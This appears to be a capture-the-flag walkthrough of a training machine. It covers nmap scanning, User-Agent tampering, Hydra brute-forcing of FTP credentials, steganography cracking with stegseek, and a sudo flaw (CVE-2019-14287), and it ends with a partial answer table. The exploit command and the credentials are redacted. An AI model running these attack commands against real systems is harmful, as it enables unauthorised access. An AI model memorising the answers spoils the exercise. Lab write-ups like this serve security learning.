This room focused on:
- Enumeration
- HTTP Header Manipulation
- FTP Access
- Steganography
- SSH Access
- Linux Privilege Escalation
- CVE Exploitation
Started with a service enumeration scan.
nmap -sC -sV TARGET-IP| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 7.6p1 |
| 80 | HTTP | Apache 2.4.29 |
Visited the webpage and found the following message:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent <REDACTED>
This indicated that the website behavior depended on the HTTP User-Agent header.
Used curl to modify the User-Agent header.
curl -A "R" http://TARGET-IPThe response changed and showed:
What are you doing! Are you one of the 25 employees?
This confirmed the application was checking User-Agent values.
Tested different User-Agent values.
Correct request:
curl -A "C" -L TARGET-IPReceived hidden message:
Attention <REDACTED USER>,
Do you still remember our deal?
Please tell agent J about the stuff ASAP.
Also, change your password, is weak!
From,
Agent <REDACTED>
| Item | Value |
|---|---|
| Username | |
| Additional Agent | J |
| Password Hint | Weak Password |
Used Hydra against FTP with the discovered username.
hydra -l <REDACTED USER> -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt ftp://TARGET-IP -VSuccessfully obtained FTP credentials.
Connected to FTP:
ftp TARGET-IPListed files:
lsFiles discovered:
To_agentJ.txt
cute-<REDACTED PASSWORD>.jpg
cutie.png
Downloaded files:
get To_agentJ.txt
get cute-<REDACTED PASSWORD>.jpg
get cutie.pngOpened the text file:
cat To_agentJ.txtContents:
Dear agent J,
All these <REDACTED PASSWORD> like photos are fake! Agent <REDACTED> stored the real picture inside your directory.
Your login password is somehow stored in the fake picture.
From,
Agent <REDACTED>
This strongly suggested steganography.
Extracting Hidden Data from PNG
Used binwalk to extract embedded files.
binwalk -e cutie.pngInside the extracted directory:
8702.zip
Attempted extraction:
7z x 8702.zipThe ZIP archive required a password.
Used stegseek against the JPG image.
stegseek cute-<REDACTED PASSWORD>.jpg /usr/share/wordlists/rockyou.txtOutput:
Found passphrase: <REDACTED PASSWORD>
Extracted hidden file:
message.txt
Read the file:
cat message.txtContents:
Hi <REDACTED USER>,
Glad you find this message. Your login password is <REDACTED PASSWORD>
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
<REDACTED USER>
Connected through SSH:
ssh <USER>@TARGET-IPPassword:
<REDACTED PASSWORD>
Listed files:
ls -alDiscovered:
user_flag.txt
Read the flag:
cat user_flag.txtChecked sudo permissions:
sudo -lOutput:
(ALL, !root) /bin/bash
This sudo configuration is vulnerable to:
CVE-2019-14287 (Publicly Known Sudo Vulnerability)
Used the sudo UID bypass exploit:
<REDACTED PRIVILEGE ESCALATION COMMAND>Verified root access:
whoamiOutput:
root
Read the root flag:
cat /root/root.txt- Nmap Enumeration
- FTP Enumeration
- Gobuster
- HTTP User-Agent Manipulation
- Hydra Password Attacks
- FTP File Transfers
- Binwalk Extraction
- Steganography
- Stegseek
- SSH Access
- Linux Enumeration
- Sudo Misconfiguration
- CVE-2019-14287 Privilege Escalation
nmap -sC -sV TARGETgobuster dir -u http://TARGET -w WORDLISTcurl -A "<REDACTED>" TARGEThydra -l USER -P WORDLIST ftp://TARGETftp TARGETbinwalk -e FILEstegseek IMAGE.jpg rockyou.txtssh USER@TARGETsudo -l<REDACTED PRIVILEGE ESCALATION COMMAND>Use this version publicly if you do not want to leak spoilers or sensitive information.
This room focused on:
- Enumeration
- HTTP Header Manipulation
- FTP Access
- Steganography
- SSH Access
- Linux Privilege Escalation
Started with an Nmap scan to identify open services.
nmap -sC -sV TARGET-IP| Port | Service |
|---|---|
| 21 | FTP |
| 22 | SSH |
| 80 | HTTP |
The webpage contained a clue related to modifying the HTTP User-Agent header.
Used curl to test different User-Agent values:
curl -A "<REDACTED>" TARGET-IPThis revealed a hidden message and helped identify a valid username.
Used Hydra with a smaller password wordlist to brute force FTP credentials.
hydra -l <REDACTED> -P WORDLIST ftp://TARGET-IPSuccessfully obtained FTP access.
Discovered multiple files including:
- text notes
- image files
- hidden embedded data
Downloaded the files locally for further analysis.
Used:
- binwalk
- strings
- stegseek
- 7z
To identify hidden data inside image files.
binwalk -e IMAGE.pngstegseek IMAGE.jpg rockyou.txtRecovered:
- hidden messages
- additional credentials
- password clues
Used discovered credentials to access the machine through SSH.
ssh USER@TARGET-IPEnumerated sudo permissions:
sudo -lIdentified a vulnerable sudo configuration related to:
CVE-2019-14287
Escalated privileges successfully and obtained root access.
- Nmap Enumeration
- Gobuster
- Hydra
- FTP Enumeration
- Linux Commands
- Steganography
- SSH Access
- Privilege Escalation
- CVE Research
Sensitive information including:
- passwords
- flags
- exact credentials
- target IPs
- exploit details
have been intentionally redacted.
| Question | Answer |
|---|---|
| How did you redirect yourself to a secret page? | User-Agent |
| ZIP Password | |
| Steg Password | |
| Incident Name | Roswell autopsy |
| Privilege Escalation CVE | CVE-2019-14287 |
| Who is Agent ? |